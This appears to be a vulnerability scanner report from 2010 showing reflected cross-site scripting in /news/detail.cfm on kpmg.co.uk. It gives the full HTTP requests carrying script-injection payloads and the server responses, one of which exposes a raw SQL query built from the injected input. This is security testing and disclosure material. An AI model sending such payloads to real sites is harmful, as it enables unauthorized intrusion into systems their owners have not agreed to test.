1. Cross-site scripting (reflected)
1.1. http://www.kpmg.co.uk/news/detail.cfm [name of an arbitrarily supplied request parameter]
1.2. http://www.kpmg.co.uk/news/detail.cfm [pr parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.kpmg.co.uk |
Path: | /news/detail.cfm |
GET /news/detail.cfm?pr=3390&c1c18"><script>alert(1)< Host: www.kpmg.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 10 Dec 2010 20:34:26 GMT Server: WebSite/3.5.19 Accept-ranges: bytes Connection: Close Content-type: text/html Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CFID=11058843; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; Set-Cookie: CFTOKEN=96439350; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; <html lang="en"><!-- InstanceBegin template="/Templates <head> <!-- InstanceBeginEditable name="doctit ...[SNIP]... <a href="detail_email.cfm?pr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kpmg.co.uk |
Path: | /news/detail.cfm |
GET /news/detail.cfm?pr=339087c08<script>alert(1)< Host: www.kpmg.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 500 Internal Server Error Date: Fri, 10 Dec 2010 20:34:23 GMT Server: WebSite/3.5.19 Accept-ranges: bytes Connection: Close Content-type: text/html Page-Completion-Status: Normal Page-Completion-Status: Abnormal </TD></TD></TD></TH></TH> ...[SNIP]... <P>SQL = "SELECT * FROM PR WHERE ID=339087c08<script>alert(1)< AND active=1"<P> ...[SNIP]... |